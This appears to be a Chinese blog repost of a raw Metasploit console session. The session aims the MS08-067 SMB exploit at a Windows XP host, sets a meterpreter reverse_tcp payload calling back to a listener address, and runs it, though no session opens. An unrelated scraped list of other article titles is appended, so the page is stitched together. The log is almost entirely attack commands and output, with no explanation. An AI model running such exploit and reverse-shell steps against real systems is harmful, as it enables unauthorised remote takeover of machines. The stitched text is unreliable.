笔耕不辍

root@bt:~# msfpro
[*] Starting Metasploit Console...
[-] WARNING! The following modules could not be loaded!
[-]     /opt/metasploit/apps/pro/msf3/modules/exploits/freebsd/local/mmap.rb: NameError uninitialized constant Msf::Post::Common
Call trans opt: received. 2-19-98 13:24:18 REC:LocTrace program: runningwake up, Neo...the matrix has youfollow the white rabbit.knock, knock, Neo.(`.         ,-,` `.    ,;' /`.  ,'/ .'`. X /.'.-;--''--.._` ` (.'            /   `,           ` '   Q ',         ,   `._    \,.|         '     `-.;_':  . `  ;    `  ` --,.._;' `    ,   )   .'`._ ,  '   /_; ,''-,;' ``-``-..__``--`http://metasploit.pro=[ metasploit v4.6.2-1 [core:4.6 api:1.0]
+ -- --=[ 1134 exploits - 715 auxiliary - 194 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops
[*] Successfully loaded plugin: pro
msf > use exploit/windows/smb//ms08_067_netapi
[-] Failed to load module: exploit/windows/smb//ms08_067_netapi
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > infoName: Microsoft Server Service Relative Path Stack CorruptionModule: exploit/windows/smb/ms08_067_netapiVersion: 0Platform: WindowsPrivileged: YesLicense: Metasploit Framework License (BSD)Rank: Great
Provided by:hdm <hdm@metasploit.com>Brett Moore <brett.moore@insomniasec.com>staylorjduck <jduck@metasploit.com>
Available targets:Id  Name--  ----0   Automatic Targeting1   Windows 2000 Universal2   Windows XP SP0/SP1 Universal3   Windows XP SP2 English (AlwaysOn NX)4   Windows XP SP2 English (NX)5   Windows XP SP3 English (AlwaysOn NX)6   Windows XP SP3 English (NX)7   Windows 2003 SP0 Universal8   Windows 2003 SP1 English (NO NX)9   Windows 2003 SP1 English (NX)10  Windows 2003 SP1 Japanese (NO NX)11  Windows 2003 SP2 English (NO NX)12  Windows 2003 SP2 English (NX)13  Windows 2003 SP2 German (NO NX)14  Windows 2003 SP2 German (NX)15  Windows XP SP2 Arabic (NX)16  Windows XP SP2 Chinese - Traditional / Taiwan (NX)17  Windows XP SP2 Chinese - Simplified (NX)18  Windows XP SP2 Chinese - Traditional (NX)19  Windows XP SP2 Czech (NX)20  Windows XP SP2 Danish (NX)21  Windows XP SP2 German (NX)22  Windows XP SP2 Greek (NX)23  Windows XP SP2 Spanish (NX)24  Windows XP SP2 Finnish (NX)25  Windows XP SP2 French (NX)26  Windows XP SP2 Hebrew (NX)27  Windows XP SP2 Hungarian (NX)28  Windows XP SP2 Italian (NX)29  Windows XP SP2 Japanese (NX)30  Windows XP SP2 Korean (NX)31  Windows XP SP2 Dutch (NX)32  Windows XP SP2 Norwegian (NX)33  Windows XP SP2 Polish (NX)34  Windows XP SP2 Portuguese - Brazilian (NX)35  Windows XP SP2 Portuguese (NX)36  Windows XP SP2 Russian (NX)37  Windows XP SP2 Swedish (NX)38  Windows XP SP2 Turkish (NX)39  Windows XP SP3 Arabic (NX)40  Windows XP SP3 Chinese - Traditional / Taiwan (NX)41  Windows XP SP3 Chinese - Simplified (NX)42  Windows XP SP3 Chinese - Traditional (NX)43  Windows XP SP3 Czech (NX)44  Windows XP SP3 Danish (NX)45  Windows XP SP3 German (NX)46  Windows XP SP3 Greek (NX)47  Windows XP SP3 Spanish (NX)48  Windows XP SP3 Finnish (NX)49  Windows XP SP3 French (NX)50  Windows XP SP3 Hebrew (NX)51  Windows XP SP3 Hungarian (NX)52  Windows XP SP3 Italian (NX)53  Windows XP SP3 Japanese (NX)54  Windows XP SP3 Korean (NX)55  Windows XP SP3 Dutch (NX)56  Windows XP SP3 Norwegian (NX)57  Windows XP SP3 Polish (NX)58  Windows XP SP3 Portuguese - Brazilian (NX)59  Windows XP SP3 Portuguese (NX)60  Windows XP SP3 Russian (NX)61  Windows XP SP3 Swedish (NX)62  Windows XP SP3 Turkish (NX)63  Windows 2003 SP2 Japanese (NO NX)64  Windows 2003 SP1 Spanish (NO NX)65  Windows 2003 SP1 Spanish (NX)66  Windows 2003 SP2 Spanish (NO NX)67  Windows 2003 SP2 Spanish (NX)
Basic options:Name     Current Setting  Required  Description----     ---------------  --------  -----------RHOST                     yes       The target addressRPORT    445              yes       Set the SMB service portSMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload information:Space: 400Avoid: 8 characters
Description:This module exploits a parsing flaw in the path canonicalizationcode of NetAPI32.dll through the Server Service. This module iscapable of bypassing NX on some operating systems and service packs.The correct target must be used to prevent the Server Service (alongwith a dozen others in the same process) from crashing. Windows XPtargets seem to handle multiple successful exploitation events, but2003 targets will often crash or hang on subsequent attempts. Thisis just the first version of this module, full support for NX bypasson 2003, along with other platforms, is still in development.
References:http://cvedetails.com/cve/2008-4250/http://www.osvdb.org/49243http://www.microsoft.com/technet/security/bulletin/MS08-067.mspxhttp://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.11.14
LHOST => 192.168.11.14
msf exploit(ms08_067_netapi) > set RHOST 192.168.11.18
RHOST => 192.168.11.18
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.11.14:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Chinese - Traditional
[*] Selected Target: Windows XP SP3 Chinese - Traditional (NX)
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > sessions
Active sessions
===============
No active sessions.
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):Name     Current Setting  Required  Description----     ---------------  --------  -----------RHOST    192.168.11.18    yes       The target addressRPORT    445              yes       Set the SMB service portSMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  thread           yes       Exit technique: seh, thread, process, noneLHOST     192.168.11.14    yes       The listen addressLPORT     4444             yes       The listen port
Exploit target:Id  Name--  ----0   Automatic Targeting
msf exploit(ms08_067_netapi) >

貌似链接没有建立成功。

转载于:https://blog.51cto.com/hackerwang/1246991

***杂记-2013-07-12相关推荐

  1. (2013.01.18-2013.07.15)179天的学习小记

    (2013.01.18-2013.07.15)179天的学习小记 好久没有做个小小结咯,我的第一天学习小记是从2011.07.04开始,那时说好了在大学期间要每天记录,自我监督,就这样,这事也干了两年 ...

  2. 【Vegas原创】导出Excel时,如何将数字格式转为文本格式?(07.12.13 Update)

    DataGrid: Asp.Net WebForm中DataGrid导出的时候,在ItemDataBound内  if(e.Item.ItemType == ListItemType.Item ||  ...

  3. win10每次开机都会自检系统盘(非硬件故障)——解决方案2019.07.12

    win10每次开机都会自检系统盘(非硬件故障)--解决方案2019.07.12 参考文章: (1)win10每次开机都会自检系统盘(非硬件故障)--解决方案2019.07.12 (2)https:// ...

  4. 【跃迁之路】【522天】程序员高效学习方法论探索系列(实验阶段279-2018.07.12)...

    @(跃迁之路)专栏 [跃迁之路]奖励金计划正式开始 从2018.7.1起,[跃迁之路]奖励金计划正式起航,从今以后,每月1日,我会将自己个人上月收入的1%计入[跃迁之路]奖励金池,积累到足够金额后,将 ...

  5. 深度技术GHOST WIN7 SP1 装机旗舰版 2013 07

    深度技术GHOST WIN7 SP1 装机旗舰版  2013 07 本系统主要适用于笔记本.品牌机,也支持组装兼容机,安装后自动激活 可供品牌机专卖店及普通用户安装使用,系统安装简便快速,10分钟内即 ...

  6. 清明节 java_java生成12位唯一id 2013.3.12大三班清明节生成活动记录表.doc

    java生成12位唯一id 2013.3.12大三班清明节生成活动记录表 java生成12位唯一id 2013.3.12大三班清明节生成活动记录表 幼儿生成活动记录表 学期:二 0 一二学年度第二学期 ...

  7. 2013 12 android 凯立德秋季高清旗舰 百度云,【荐】2013.4.12凯立德春季完美安卓手机版+4月23日更新车用高清版...

    转自汤汤汤和gps之家 2013.4.12凯立德安卓自适应全分辨率不漂移完美折腾版C2025-C7E01-2C21J0C .简介 2013.4.12新的凯立德安卓自适应全分辨率内外卡通用不漂移完美 ...

  8. IDC评述网:2013年12月全国IDC品牌排行榜

    IDC评述网(idcps.com)01月02日报道:据IDC评述网最新数据,2013年12月份,全国IDC品牌关注指数排行榜中,中国万网继续稳居榜首,用户关注指数已升至1648751点.蓝讯CDN以1 ...

  9. 2013 12 android 凯立德秋季高清旗舰 百度云,凯立德导航常用工具软件(2013.4.12更新下载链接)...

    本帖最后由 xinc 于 2013-4-12 10:59 编辑 凯立德导航常用工具软件,建议下载备用,全部软件无密码,以前找这些软件还真费了点事,现在分享给GPSHK的朋友. 这些软件都比较简单,很容 ...

  10. https://www.cnblogs.com/lyhabc/archive/2013/06/12/3133273.html?tdsourcetag=s_pcqq_aiomsg

    https://www.cnblogs.com/lyhabc/archive/2013/06/12/3133273.html?tdsourcetag=s_pcqq_aiomsg CPU高的处理方式

最新文章

  1. LeetCode简单题之旅行终点站
  2. 三维的对象表示---OpenGL二次曲面和三次曲面函数
  3. ML:MLOps系列讲解之《端到端 ML工作流生命周期》解读
  4. 果然十三香!苹果全球销量超越小米重回第二,第一还是它
  5. pyinstaller下载_《快速掌握PyQt5》第二十五章 Pyinstaller打包
  6. 操作系统概念第六章部分作业题答案
  7. 【工具分享】分享一个移动端网络诊断工具(适用于安卓平台)
  8. java窗体图标的设置
  9. Code Smell 检测工具调研
  10. Linuxnbsp;cat命令详解
  11. 图片加载防闪动的CSS方法
  12. Incompatible pointer types assigning to ‘id<PHPickerViewControllerDelegate> _Nullable‘ from ‘Class‘
  13. python三维建模需要用到哪些知识_参加数学建模需要学习哪些方面的知识?
  14. 解决Android studio启动模拟器一直Waiting for target device to come online的一种方式
  15. Linux系统有哪些?盘点常用的 8 个Linux系统!
  16. Android incorrect AVA format
  17. 70道关于JavaScript的常见面试题解答
  18. 联通3g升级4g显示无服务器,中国联通回应关闭2G3G信号 协助2G用户向3G4G网络升级方案 移动关闭2G3G了吗...
  19. Error: Permission denied (publickey) 的解决方法
  20. 网络威胁分析师必须具备的十种能力

热门文章

  1. 字符设备编号的注册分配
  2. WinAPI: SetWindowPos - 改变窗口的位置与状态
  3. 日志服务器搭建之多服务器日志转发与格式化处理
  4. 使用MongoDB存储Docker日志(续)
  5. 墨卡托坐标转换成经纬度
  6. 使用shell统计字符串出现的次数,并从大到小进行排序显示
  7. 模式识别之数字识别---扑克牌识别
  8. 测试基础 – 软件测试计划
  9. 菜鸟学习日记:跟我一起学office2007之Excel【02基础篇】04Excel基础知识二
  10. 你了解 Performance Timeline Level 2 吗?